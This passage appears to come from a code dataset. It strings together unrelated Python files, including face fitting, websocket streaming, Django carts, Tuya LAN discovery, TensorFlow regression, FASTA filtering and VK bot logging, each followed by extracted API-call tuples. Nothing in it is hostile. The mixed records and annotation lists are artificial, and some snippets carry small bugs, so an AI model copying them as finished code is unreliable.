"pytest.fixture",
"unittest.mock.patch",
"tests.utils.mock_backend.ApiKey",
"tests.utils.mock_backend.Run",
"tests.utils.mock_backend.BackendContext"
] | [((541, 572), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""session"""'}), "(scope='session')\n", (555, 572), False, 'import pytest\n'), ((898, 944), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""', 'autouse': '(True)'}), "(scope='function', autouse=True)\n", (912, 944), False, 'import pytest\n'), ((1408, 1453), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""session"""', 'autouse': '(True)'}), "(scope='session', autouse=True)\n", (1422, 1453), False, 'import pytest\n'), ((621, 627), 'tests.utils.mock_backend.User', 'User', ([], {}), '()\n', (625, 627), False, 'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((643, 658), 'tests.utils.mock_backend.ApiKey', 'ApiKey', (['user.Id'], {}), '(user.Id)\n', (649, 658), False, 'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((671, 701), 'tests.utils.mock_backend.Team', 'Team', (['user.Id'], {'isPersonal': '(True)'}), '(user.Id, isPersonal=True)\n', (675, 701), False, 'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((717, 733), 'tests.utils.mock_backend.Project', 'Project', (['team.Id'], {}), '(team.Id)\n', (724, 733), False, 'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((745, 802), 'tests.utils.mock_backend.Run', 'Run', ([], {'userId': 'user.Id', 'teamId': 'team.Id', 'projectId': 'project.Id'}), '(userId=user.Id, teamId=team.Id, projectId=project.Id)\n', (748, 802), False, 'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((993, 1069), 'logging.info', 'logging.info', (['"""Patching tests.utils.mock_backend.ctx to have default values"""'], {}), "('Patching tests.utils.mock_backend.ctx to have default values')\n", (1005, 1069), False, 'import logging\n'), ((1083, 1099), 'tests.utils.mock_backend.BackendContext', 'BackendContext', ([], {}), '()\n', (1097, 1099), False, 'from tests.utils.mock_backend import ApiKey, BackendContext, Run, Project, Team, User\n'), ((1326, 1401), 'logging.info', 'logging.info', (['"""unpatching tests.utils.mock_backend.ctx back to fresh state"""'], {}), "('unpatching tests.utils.mock_backend.ctx back to fresh state')\n", (1338, 1401), False, 'import logging\n'), ((1669, 1727), 'logging.info', 'logging.info', (['"""unpatching manta_lab.api.client_BaseClient"""'], {}), "('unpatching manta_lab.api.client_BaseClient')\n", (1681, 1727), False, 'import logging\n'), ((1185, 1227), 'unittest.mock.patch', 'patch', (['"""tests.utils.mock_backend.ctx"""', 'ctx'], {}), "('tests.utils.mock_backend.ctx', ctx)\n", (1190, 1227), False, 'from unittest.mock import patch\n'), ((1238, 1303), 'logging.info', 'logging.info', (['"""Successfully patched tests.utils.mock_backend.ctx"""'], {}), "('Successfully patched tests.utils.mock_backend.ctx')\n", (1250, 1303), False, 'import logging\n'), ((1490, 1547), 'unittest.mock.patch', 'patch', (['"""manta_lab.api.client._BaseClient"""', 'MockBaseClient'], {}), "('manta_lab.api.client._BaseClient', MockBaseClient)\n", (1495, 1547), False, 'from unittest.mock import patch\n'), ((1558, 1651), 'logging.info', 'logging.info', (['"""Successfully patched manta_lab.api.client_BaseClient with MockBaseClient"""'], {}), "(\n 'Successfully patched manta_lab.api.client_BaseClient with MockBaseClient')\n", (1570, 1651), False, 'import logging\n')] |
"""
Run this class to save the 3D face tracking pipeline into a folder.
"""
import cv2
import os
import time
import utils
import face_alignment as fa
import face_detection as fd
import face_fit as ff
input_folder = './data/source/' # The input images path.
output_folder = './data/results/' # The output images path.
if not os.path.exists(output_folder):
os.makedirs(output_folder)
files = os.listdir(input_folder)
count = 1
for file in files:
output_name = 'image_' + str(count)
img = cv2.imread(input_folder + file, cv2.IMREAD_COLOR)
h, w, _ = img.shape
if img is not None:
print('Processing ' + output_name + ':')
start = time.time()
bboxes = fd.detect_faces(img, detector=fd.Face_Detector.DLIB)
elapsed_time_1 = time.time() - start
print('\tface detection: %.5f sec' % elapsed_time_1)
if len(bboxes):
bboxes_img = fd.draw_bboxes(img.copy(), bboxes)
cv2.imwrite(output_folder + output_name + '_1.jpg', bboxes_img)
start = time.time()
new_bboxes = fd.resize_bboxes(bboxes)
elapsed_time_2 = time.time() - start
print('\tbbox resizing: %.5f sec' % elapsed_time_2)
new_bboxes_img = fd.draw_bboxes(img.copy(), new_bboxes)
cv2.imwrite(output_folder + output_name + '_2.jpg', new_bboxes_img)
start = time.time()
crops = fd.crop_faces(img, new_bboxes)
elapsed_time_3 = time.time() - start
print('\tface cropping: %.5f sec' % elapsed_time_3)
count_crops = 0
for crop_img in crops:
print('\t\tCrop ' + str(count_crops) + ':')
crop_h, crop_w, _ = crop_img.shape
cv2.imwrite(output_folder + output_name + '_3_' + str(count_crops) + '.jpg', crop_img)
start = time.time()
new_img = utils.resize_image(crop_img.copy(), width=fa.std_size, height=fa.std_size)
elapsed_time_4 = time.time() - start
print('\t\t\tcrop resizing: %.5f sec' % elapsed_time_4)
cv2.imwrite(output_folder + output_name + '_4_' + str(count_crops) + '.jpg', new_img)
start = time.time()
pitch, yaw, roll, scale, rotation, t3d, cam_matrix, landmarks, factor = fa.predict_pose(new_img, new_bboxes[count_crops], dense=False)
elapsed_time_5 = time.time() - start
print('\t\t\tpose prediction: %.5f sec' % elapsed_time_5)
lmks_image = fd.draw_landmarks(img.copy(), landmarks, drawer=fd.Face_Landmarks_Drawer.DDFA)
cv2.imwrite(output_folder + output_name + '_5_' + str(count_crops) + '.jpg', lmks_image)
start = time.time()
fit_img, fit_kpts = ff.fit_3dmm(rotation, t3d, scale * factor, width=crop_w, height=crop_h)
elapsed_time_6 = time.time() - start
print('\t\t\tface fitting: %.5f sec' % elapsed_time_6)
cv2.imwrite(output_folder + output_name + '_6_' + str(count_crops) + '.png', fit_img)
fit_lmks_img = fd.draw_landmarks(fit_img.copy(), fit_kpts, drawer=fd.Face_Landmarks_Drawer.FACE3D)
cv2.imwrite(output_folder + output_name + '_7_' + str(count_crops) + '.jpg', fit_lmks_img)
start = time.time()
fore_lmks, back_lmks = utils.landmarks_to_np_array(fit_kpts, landmarks)
elapsed_time_7 = time.time() - start
print('\t\t\tlandmarks setting: %.5f sec' % elapsed_time_7)
start = time.time()
homography, mask = cv2.findHomography(fore_lmks, back_lmks, cv2.RANSAC)
elapsed_time_8 = time.time() - start
print('\t\t\thomography computation: %.5f sec' % elapsed_time_8)
start = time.time()
warp_img = cv2.warpPerspective(fit_img, homography, (w, h))
elapsed_time_9 = time.time() - start
print('\t\t\twarp perspective: %.5f sec' % elapsed_time_9)
cv2.imwrite(output_folder + output_name + '_8_' + str(count_crops) + '.png', warp_img)
start = time.time()
blend_img = utils.create_transparent_overlay_faster(warp_img, img, w, h)
elapsed_time_10 = time.time() - start
print('\t\t\ttransparent overlay: %.5f sec' % elapsed_time_10)
cv2.imwrite(output_folder + output_name + '_9_' + str(count_crops) + '.jpg', blend_img)
count_crops += 1
print('\t\t\telapsed time: %.5f' % (elapsed_time_1 + elapsed_time_2 + elapsed_time_3 + elapsed_time_4 + elapsed_time_5 + elapsed_time_6
+ elapsed_time_7 + elapsed_time_8 + elapsed_time_9 + elapsed_time_10))
print('\tfitted succefully!')
count += 1
| [
"face_detection.crop_faces",
"os.path.exists",
"cv2.imwrite",
"os.listdir",
"os.makedirs",
"face_fit.fit_3dmm",
"utils.landmarks_to_np_array",
"cv2.findHomography",
"utils.create_transparent_overlay_faster",
"cv2.warpPerspective",
"time.time",
"face_alignment.predict_pose",
"face_detection.r... | [((402, 426), 'os.listdir', 'os.listdir', (['input_folder'], {}), '(input_folder)\n', (412, 426), False, 'import os\n'), ((327, 356), 'os.path.exists', 'os.path.exists', (['output_folder'], {}), '(output_folder)\n', (341, 356), False, 'import os\n'), ((362, 388), 'os.makedirs', 'os.makedirs', (['output_folder'], {}), '(output_folder)\n', (373, 388), False, 'import os\n'), ((508, 557), 'cv2.imread', 'cv2.imread', (['(input_folder + file)', 'cv2.IMREAD_COLOR'], {}), '(input_folder + file, cv2.IMREAD_COLOR)\n', (518, 557), False, 'import cv2\n'), ((685, 696), 'time.time', 'time.time', ([], {}), '()\n', (694, 696), False, 'import time\n'), ((714, 766), 'face_detection.detect_faces', 'fd.detect_faces', (['img'], {'detector': 'fd.Face_Detector.DLIB'}), '(img, detector=fd.Face_Detector.DLIB)\n', (729, 766), True, 'import face_detection as fd\n'), ((792, 803), 'time.time', 'time.time', ([], {}), '()\n', (801, 803), False, 'import time\n'), ((982, 1045), 'cv2.imwrite', 'cv2.imwrite', (["(output_folder + output_name + '_1.jpg')", 'bboxes_img'], {}), "(output_folder + output_name + '_1.jpg', bboxes_img)\n", (993, 1045), False, 'import cv2\n'), ((1079, 1090), 'time.time', 'time.time', ([], {}), '()\n', (1088, 1090), False, 'import time\n'), ((1116, 1140), 'face_detection.resize_bboxes', 'fd.resize_bboxes', (['bboxes'], {}), '(bboxes)\n', (1132, 1140), True, 'import face_detection as fd\n'), ((1357, 1424), 'cv2.imwrite', 'cv2.imwrite', (["(output_folder + output_name + '_2.jpg')", 'new_bboxes_img'], {}), "(output_folder + output_name + '_2.jpg', new_bboxes_img)\n", (1368, 1424), False, 'import cv2\n'), ((1458, 1469), 'time.time', 'time.time', ([], {}), '()\n', (1467, 1469), False, 'import time\n'), ((1490, 1520), 'face_detection.crop_faces', 'fd.crop_faces', (['img', 'new_bboxes'], {}), '(img, new_bboxes)\n', (1503, 1520), True, 'import face_detection as fd\n'), ((1170, 1181), 'time.time', 'time.time', ([], {}), '()\n', (1179, 1181), False, 'import time\n'), ((1550, 1561), 'time.time', 'time.time', ([], {}), '()\n', (1559, 1561), False, 'import time\n'), ((1995, 2006), 'time.time', 'time.time', ([], {}), '()\n', (2004, 2006), False, 'import time\n'), ((2393, 2404), 'time.time', 'time.time', ([], {}), '()\n', (2402, 2404), False, 'import time\n'), ((2493, 2555), 'face_alignment.predict_pose', 'fa.predict_pose', (['new_img', 'new_bboxes[count_crops]'], {'dense': '(False)'}), '(new_img, new_bboxes[count_crops], dense=False)\n', (2508, 2555), True, 'import face_alignment as fa\n'), ((2938, 2949), 'time.time', 'time.time', ([], {}), '()\n', (2947, 2949), False, 'import time\n'), ((2986, 3057), 'face_fit.fit_3dmm', 'ff.fit_3dmm', (['rotation', 't3d', '(scale * factor)'], {'width': 'crop_w', 'height': 'crop_h'}), '(rotation, t3d, scale * factor, width=crop_w, height=crop_h)\n', (2997, 3057), True, 'import face_fit as ff\n'), ((3589, 3600), 'time.time', 'time.time', ([], {}), '()\n', (3598, 3600), False, 'import time\n'), ((3640, 3688), 'utils.landmarks_to_np_array', 'utils.landmarks_to_np_array', (['fit_kpts', 'landmarks'], {}), '(fit_kpts, landmarks)\n', (3667, 3688), False, 'import utils\n'), ((3859, 3870), 'time.time', 'time.time', ([], {}), '()\n', (3868, 3870), False, 'import time\n'), ((3906, 3958), 'cv2.findHomography', 'cv2.findHomography', (['fore_lmks', 'back_lmks', 'cv2.RANSAC'], {}), '(fore_lmks, back_lmks, cv2.RANSAC)\n', (3924, 3958), False, 'import cv2\n'), ((4134, 4145), 'time.time', 'time.time', ([], {}), '()\n', (4143, 4145), False, 'import time\n'), ((4173, 4221), 'cv2.warpPerspective', 'cv2.warpPerspective', (['fit_img', 'homography', '(w, h)'], {}), '(fit_img, homography, (w, h))\n', (4192, 4221), False, 'import cv2\n'), ((4511, 4522), 'time.time', 'time.time', ([], {}), '()\n', (4520, 4522), False, 'import time\n'), ((4551, 4611), 'utils.create_transparent_overlay_faster', 'utils.create_transparent_overlay_faster', (['warp_img', 'img', 'w', 'h'], {}), '(warp_img, img, w, h)\n', (4590, 4611), False, 'import utils\n'), ((2141, 2152), 'time.time', 'time.time', ([], {}), '()\n', (2150, 2152), False, 'import time\n'), ((2589, 2600), 'time.time', 'time.time', ([], {}), '()\n', (2598, 2600), False, 'import time\n'), ((3091, 3102), 'time.time', 'time.time', ([], {}), '()\n', (3100, 3102), False, 'import time\n'), ((3722, 3733), 'time.time', 'time.time', ([], {}), '()\n', (3731, 3733), False, 'import time\n'), ((3992, 4003), 'time.time', 'time.time', ([], {}), '()\n', (4001, 4003), False, 'import time\n'), ((4255, 4266), 'time.time', 'time.time', ([], {}), '()\n', (4264, 4266), False, 'import time\n'), ((4646, 4657), 'time.time', 'time.time', ([], {}), '()\n', (4655, 4657), False, 'import time\n')] |
from tornado import websocket, web, ioloop
import json
streamers = []
streamees = dict()
streamees_check = []
image = str()
class StreamerHandler(websocket.WebSocketHandler):
def open(self, ws_id):
self.ws_id = ws_id
global streamers
if self not in streamers:
streamers.append(self)
def on_message(self, message):
self.write_message("OK")
if self.ws_id in streamees.keys():
for streamee in streamees[self.ws_id]:
streamee.write_message(message)
def on_close(self):
global streamers
if self in streamers:
streamers.remove(self)
class StreameeHandler(websocket.WebSocketHandler):
def open(self, ws_id):
self.ws_id = ws_id
global streamees_check, streamees
if self not in streamees_check:
if not ws_id in streamees.keys():
streamees[ws_id] = list()
streamees[ws_id].append(self)
streamees_check.append(self)
def on_close(self):
global streamees, streamees_check
if self in streamees_check:
streamees_check.remove(self)
streamees[self.ws_id].remove(self)
settings = {'auto_reload': True, 'debug': True}
streamer_app = web.Application([
(r'/streamer/(.*)', StreamerHandler)
], **settings)
streamee_app = web.Application([
(r'/streamee/(.*)', StreameeHandler)
], **settings)
if __name__ == '__main__':
streamee_app.listen(8888)
streamer_app.listen(8889)
ioloop.IOLoop.instance().start()
| [
"tornado.ioloop.IOLoop.instance",
"tornado.web.Application"
] | [((1276, 1342), 'tornado.web.Application', 'web.Application', (["[('/streamer/(.*)', StreamerHandler)]"], {}), "([('/streamer/(.*)', StreamerHandler)], **settings)\n", (1291, 1342), False, 'from tornado import websocket, web, ioloop\n'), ((1366, 1432), 'tornado.web.Application', 'web.Application', (["[('/streamee/(.*)', StreameeHandler)]"], {}), "([('/streamee/(.*)', StreameeHandler)], **settings)\n", (1381, 1432), False, 'from tornado import websocket, web, ioloop\n'), ((1533, 1557), 'tornado.ioloop.IOLoop.instance', 'ioloop.IOLoop.instance', ([], {}), '()\n', (1555, 1557), False, 'from tornado import websocket, web, ioloop\n')] |
import os
from astropy.io import ascii
import initialize_mosdef_dirs as imd
import matplotlib.pyplot as plt
def plot_scaled_composites(n_clusters):
"""Using the scaling that was done above, plot the scaled composite seds
Parameters:
n_clusters (int): Number of clusters
"""
fig, ax = plt.subplots(figsize=(8, 7))
for groupID in range(n_clusters):
data_df = ascii.read(imd.composite_sed_csvs_dir + f'/{groupID}_sed.csv').to_pandas()
if len(os.listdir(imd.cluster_dir + f'/{groupID}')) < 15:
continue
ax.plot(data_df['rest_wavelength'], data_df['rest_wavelength']*data_df['f_lambda_scaled'], ls='-', marker='None')
# ax.plot([5000, 5000], [-10, 10], ls='--', color='black')
ax.set_xscale('log')
ax.set_xlim(800, 45000)
# ax.set_ylim(-1e-16, 9e-16)
ax.set_xlabel('Rest Wavelength ($\AA$)', fontsize=14)
ax.set_ylabel('Normalized Flux ($\lambda$ F$_\lambda$)', fontsize=14)
ax.tick_params(size=12)
fig.savefig(imd.composite_sed_images_dir + '/scaled_composites.pdf')
| [
"astropy.io.ascii.read",
"os.listdir",
"matplotlib.pyplot.subplots"
] | [((313, 341), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(8, 7)'}), '(figsize=(8, 7))\n', (325, 341), True, 'import matplotlib.pyplot as plt\n'), ((398, 460), 'astropy.io.ascii.read', 'ascii.read', (["(imd.composite_sed_csvs_dir + f'/{groupID}_sed.csv')"], {}), "(imd.composite_sed_csvs_dir + f'/{groupID}_sed.csv')\n", (408, 460), False, 'from astropy.io import ascii\n'), ((488, 531), 'os.listdir', 'os.listdir', (["(imd.cluster_dir + f'/{groupID}')"], {}), "(imd.cluster_dir + f'/{groupID}')\n", (498, 531), False, 'import os\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from shop.models import Product
from accounts.models import User
class Cart(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, null=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
paid = models.BooleanField(default=False)
is_in_order = models.BooleanField(default=False)
class Meta:
ordering = ('-created',)
def __str__(self):
return 'cart {}'.format(self.user.email)
def get_total_cost(self):
return sum(item.get_cost() for item in self.items.all())
class CartItem(models.Model):
cart = models.ForeignKey(Cart, related_name='items',
null=True,
on_delete=models.CASCADE,
)
product = models.ForeignKey(Product,
related_name='cart_items',
on_delete=models.CASCADE,
)
price = models.DecimalField(max_digits=10, decimal_places=2, default=0)
quantity = models.PositiveIntegerField(default=1)
def __str__(self):
return '{}'.format(self.product.name)
def get_cost(self):
return self.price * self.quantity
| [
"django.db.models.OneToOneField",
"django.db.models.ForeignKey",
"django.db.models.BooleanField",
"django.db.models.PositiveIntegerField",
"django.db.models.DateTimeField",
"django.db.models.DecimalField"
] | [((198, 261), 'django.db.models.OneToOneField', 'models.OneToOneField', (['User'], {'on_delete': 'models.CASCADE', 'null': '(True)'}), '(User, on_delete=models.CASCADE, null=True)\n', (218, 261), False, 'from django.db import models\n'), ((276, 315), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (296, 315), False, 'from django.db import models\n'), ((330, 365), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (350, 365), False, 'from django.db import models\n'), ((377, 411), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (396, 411), False, 'from django.db import models\n'), ((430, 464), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (449, 464), False, 'from django.db import models\n'), ((727, 814), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Cart'], {'related_name': '"""items"""', 'null': '(True)', 'on_delete': 'models.CASCADE'}), "(Cart, related_name='items', null=True, on_delete=models.\n CASCADE)\n", (744, 814), False, 'from django.db import models\n'), ((838, 917), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Product'], {'related_name': '"""cart_items"""', 'on_delete': 'models.CASCADE'}), "(Product, related_name='cart_items', on_delete=models.CASCADE)\n", (855, 917), False, 'from django.db import models\n'), ((944, 1007), 'django.db.models.DecimalField', 'models.DecimalField', ([], {'max_digits': '(10)', 'decimal_places': '(2)', 'default': '(0)'}), '(max_digits=10, decimal_places=2, default=0)\n', (963, 1007), False, 'from django.db import models\n'), ((1023, 1061), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(1)'}), '(default=1)\n', (1050, 1061), False, 'from django.db import models\n')] |
#!/usr/bin/env python3
# encoding: utf-8
"""
tuya-discovery.py
Created by kueblc on 2019-11-13.
Discover Tuya devices on the LAN via UDP broadcast
"""
import asyncio
import json
from Crypto.Cipher import AES
pad = lambda s: s + (16 - len(s) % 16) * chr(16 - len(s) % 16)
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
encrypt = lambda msg, key: AES.new(key, AES.MODE_ECB).encrypt(pad(msg))
decrypt = lambda msg, key: unpad(AES.new(key, AES.MODE_ECB).decrypt(msg))
from hashlib import md5
udpkey = md5(b"yGAdlopoPVldABfn").digest()
decrypt_udp = lambda msg: decrypt(msg, udpkey)
class TuyaDiscovery(asyncio.DatagramProtocol):
def datagram_received(self, data, addr):
# remove message frame
data = data[20:-8]
# decrypt if encrypted
try:
data = decrypt_udp(data)
except:
pass
# parse json
try:
data = json.loads(data)
except:
pass
print(addr[0], data)
def main():
loop = asyncio.get_event_loop()
listener = loop.create_datagram_endpoint(TuyaDiscovery, local_addr=('0.0.0.0', 6666))
encrypted_listener = loop.create_datagram_endpoint(TuyaDiscovery, local_addr=('0.0.0.0', 6667))
loop.run_until_complete(listener)
print("Listening for Tuya broadcast on UDP 6666")
loop.run_until_complete(encrypted_listener)
print("Listening for encrypted Tuya broadcast on UDP 6667")
try:
loop.run_forever()
except KeyboardInterrupt:
loop.stop()
if __name__ == "__main__":
main()
| [
"json.loads",
"asyncio.get_event_loop",
"Crypto.Cipher.AES.new",
"hashlib.md5"
] | [((902, 926), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (924, 926), False, 'import asyncio\n'), ((496, 520), 'hashlib.md5', 'md5', (["b'yGAdlopoPVldABfn'"], {}), "(b'yGAdlopoPVldABfn')\n", (499, 520), False, 'from hashlib import md5\n'), ((343, 369), 'Crypto.Cipher.AES.new', 'AES.new', (['key', 'AES.MODE_ECB'], {}), '(key, AES.MODE_ECB)\n', (350, 369), False, 'from Crypto.Cipher import AES\n'), ((823, 839), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (833, 839), False, 'import json\n'), ((421, 447), 'Crypto.Cipher.AES.new', 'AES.new', (['key', 'AES.MODE_ECB'], {}), '(key, AES.MODE_ECB)\n', (428, 447), False, 'from Crypto.Cipher import AES\n')] |
import tensorflow as tf
import numpy as np
from interfaces import AbstractSelfAdaptingStrategy
def _get_category_encoding_layer(size):
return lambda feature: tf.one_hot(feature, size + 1) # +1 since classes are labeled from 1
def _prepare_inputs():
all_inputs = tf.keras.Input(shape=(2,), dtype='int32')
encoded_features = []
domain_sizes = [1875, 20]
for idx in range(0, 2):
encoding_layer = _get_category_encoding_layer(domain_sizes[idx])
encoded_col = encoding_layer(all_inputs[:, idx])
encoded_features.append(encoded_col)
return all_inputs, encoded_features
def _create_model(layers_widths):
all_inputs, encoded_features = _prepare_inputs()
last_layer = tf.keras.layers.Concatenate()(encoded_features)
for width in layers_widths:
last_layer = tf.keras.layers.Dense(int(width), activation=tf.keras.activations.relu)(last_layer)
output = tf.keras.layers.Dense(1, tf.keras.activations.exponential)(last_layer)
model = tf.keras.Model(inputs=all_inputs, outputs=output)
learning_rate = tf.keras.experimental.CosineDecay(0.01, 10000000)
model.compile(optimizer=tf.optimizers.Adam(learning_rate=learning_rate), loss=tf.losses.Poisson())
# model.summary()
return model
def _jobs_to_tensors(jobs):
x = list(map(lambda job: [job.exercise_id, job.runtime_id], jobs))
y = list(map(lambda job: [job.duration], jobs))
return tf.convert_to_tensor(x, dtype=tf.int32), tf.convert_to_tensor(y, dtype=tf.float32)
class CategorySelfAdaptingStrategy(AbstractSelfAdaptingStrategy):
"""Uses machine-learning neural-network regression model to predict the job duration.
The model is trained in SA and used by dispatcher (via estimation function interface).
The model is implemented in TensorFlow.
"""
def __init__(self, layers_widths=[64], batch_size=5000, batch_epochs=5, ref_jobs=None):
tf.config.threading.set_inter_op_parallelism_threads(8)
tf.config.threading.set_intra_op_parallelism_threads(8)
# tf.config.set_visible_devices([], 'GPU')
self.layers_widths = layers_widths
self.batch_size = batch_size
self.batch_epochs = batch_epochs
self.ref_jobs = ref_jobs[:] if ref_jobs else None
self.buffer = []
self.model = None
def _advance_ts(self, ts):
while len(self.ref_jobs) > 0 and self.ref_jobs[-1].spawn_ts + self.ref_jobs[-1].duration <= ts:
job = self.ref_jobs.pop()
if job.compilation_ok:
self.buffer.append(job)
def _train_batch(self):
"""Take the job buffer and use it as batch for training."""
if len(self.buffer) > self.batch_size:
x, y = _jobs_to_tensors(self.buffer)
self.model.fit(x, y, batch_size=len(self.buffer), epochs=self.batch_epochs, verbose=False)
self.buffer = [] # reset the job buffer at the end
def init(self, ts, dispatcher, workers):
self.model = _create_model(self.layers_widths)
self._advance_ts(ts)
self._train_batch()
@tf.function
def predict_single(input):
return self.model(input, training=False)[0]
def predictor(job):
x = np.array([[job.exercise_id, job.runtime_id]], dtype='int32')
return predict_single(x).numpy()[0]
dispatcher.set_predictor(predictor)
def do_adapt(self, ts, dispatcher, workers, job=None):
self._advance_ts(ts)
if job and job.compilation_ok:
self.buffer.append(job)
self._train_batch()
| [
"tensorflow.one_hot",
"tensorflow.losses.Poisson",
"tensorflow.config.threading.set_intra_op_parallelism_threads",
"tensorflow.keras.layers.Concatenate",
"tensorflow.convert_to_tensor",
"numpy.array",
"tensorflow.keras.experimental.CosineDecay",
"tensorflow.keras.layers.Dense",
"tensorflow.config.th... | [((275, 316), 'tensorflow.keras.Input', 'tf.keras.Input', ([], {'shape': '(2,)', 'dtype': '"""int32"""'}), "(shape=(2,), dtype='int32')\n", (289, 316), True, 'import tensorflow as tf\n'), ((1006, 1055), 'tensorflow.keras.Model', 'tf.keras.Model', ([], {'inputs': 'all_inputs', 'outputs': 'output'}), '(inputs=all_inputs, outputs=output)\n', (1020, 1055), True, 'import tensorflow as tf\n'), ((1076, 1125), 'tensorflow.keras.experimental.CosineDecay', 'tf.keras.experimental.CosineDecay', (['(0.01)', '(10000000)'], {}), '(0.01, 10000000)\n', (1109, 1125), True, 'import tensorflow as tf\n'), ((164, 193), 'tensorflow.one_hot', 'tf.one_hot', (['feature', '(size + 1)'], {}), '(feature, size + 1)\n', (174, 193), True, 'import tensorflow as tf\n'), ((724, 753), 'tensorflow.keras.layers.Concatenate', 'tf.keras.layers.Concatenate', ([], {}), '()\n', (751, 753), True, 'import tensorflow as tf\n'), ((922, 980), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(1)', 'tf.keras.activations.exponential'], {}), '(1, tf.keras.activations.exponential)\n', (943, 980), True, 'import tensorflow as tf\n'), ((1432, 1471), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['x'], {'dtype': 'tf.int32'}), '(x, dtype=tf.int32)\n', (1452, 1471), True, 'import tensorflow as tf\n'), ((1473, 1514), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['y'], {'dtype': 'tf.float32'}), '(y, dtype=tf.float32)\n', (1493, 1514), True, 'import tensorflow as tf\n'), ((1918, 1973), 'tensorflow.config.threading.set_inter_op_parallelism_threads', 'tf.config.threading.set_inter_op_parallelism_threads', (['(8)'], {}), '(8)\n', (1970, 1973), True, 'import tensorflow as tf\n'), ((1982, 2037), 'tensorflow.config.threading.set_intra_op_parallelism_threads', 'tf.config.threading.set_intra_op_parallelism_threads', (['(8)'], {}), '(8)\n', (2034, 2037), True, 'import tensorflow as tf\n'), ((1154, 1201), 'tensorflow.optimizers.Adam', 'tf.optimizers.Adam', ([], {'learning_rate': 'learning_rate'}), '(learning_rate=learning_rate)\n', (1172, 1201), True, 'import tensorflow as tf\n'), ((1208, 1227), 'tensorflow.losses.Poisson', 'tf.losses.Poisson', ([], {}), '()\n', (1225, 1227), True, 'import tensorflow as tf\n'), ((3245, 3305), 'numpy.array', 'np.array', (['[[job.exercise_id, job.runtime_id]]'], {'dtype': '"""int32"""'}), "([[job.exercise_id, job.runtime_id]], dtype='int32')\n", (3253, 3305), True, 'import numpy as np\n')] |
# Generated by Django 2.2.7 on 2020-01-04 23:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('MainProject', '0023_auto_20200105_0203'),
]
operations = [
migrations.AddField(
model_name='coursematerial',
name='doc_file',
field=models.FileField(null=True, upload_to='documents/'),
),
migrations.DeleteModel(
name='CourseMaterialFile',
),
]
| [
"django.db.migrations.DeleteModel",
"django.db.models.FileField"
] | [((420, 469), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', ([], {'name': '"""CourseMaterialFile"""'}), "(name='CourseMaterialFile')\n", (442, 469), False, 'from django.db import migrations, models\n'), ((348, 399), 'django.db.models.FileField', 'models.FileField', ([], {'null': '(True)', 'upload_to': '"""documents/"""'}), "(null=True, upload_to='documents/')\n", (364, 399), False, 'from django.db import migrations, models\n')] |
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
from __future__ import division, print_function
from Bio import SeqIO
import sys
getName = lambda x : x if "_" not in x else x[:x.rfind("_")]
data = {}
with open(sys.argv[1], "r") as inF:
for record in SeqIO.parse(inF, "fasta"):
fullName = record.name
seq = str(record.seq)
l = data.get(seq, [])
l.append(fullName)
data[seq] = l
# now filter out all singletons
with open(sys.argv[2], "w") as outF:
for seq in data:
names = data[seq]
indNames = set()
for name in names:
indNames.add(getName(name))
if len(indNames) >= 2:
for name in names:
outF.write(">%s\n%s\n" % (name, seq))
| [
"Bio.SeqIO.parse"
] | [((256, 281), 'Bio.SeqIO.parse', 'SeqIO.parse', (['inF', '"""fasta"""'], {}), "(inF, 'fasta')\n", (267, 281), False, 'from Bio import SeqIO\n')] |
import codecs
import importlib
import logging
import os
import sys
import time
import html
import accounts
import config
import log
import storage
from args import args
from vkapi import VkApi
from vkbot import createVkApi
from scripts import runScript, runInMaster
os.chdir(os.path.dirname(os.path.realpath(sys.argv[0])))
accounts.init()
class MyHandler(logging.Handler):
def emit(self, record):
pass
def handle(self, record):
msg = record.getMessage()
lvl = record.levelname
if any(msg.lower().startswith(i) for i in ('red|', 'green|', 'yellow|')):
color, msg = msg.split('|', maxsplit=1)
log.info((msg, html.escape(msg)), color.lower())
return
db_msg = getattr(record, 'db', None)
if db_msg:
msg = (msg, db_msg)
if lvl == 'CRITICAL':
log.error(msg, fatal=True)
elif lvl == 'ERROR':
log.error(msg, record.exc_info is not None)
elif lvl == 'WARNING':
log.warning(msg)
elif lvl == 'INFO':
log.info(msg)
elif lvl == 'DEBUG':
log.debug(msg)
logging.basicConfig(handlers=[MyHandler()], level=logging.DEBUG)
logging.getLogger('antigate').setLevel(logging.CRITICAL)
logging.getLogger('requests').setLevel(logging.CRITICAL)
logging.getLogger('asyncio').setLevel(logging.CRITICAL)
if config.get('vkbot.suppress_chat_stderr', 'b'):
logging.getLogger('chatlog').setLevel(logging.CRITICAL)
os.environ['LC_ALL'] = 'ru_RU.utf-8'
sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach())
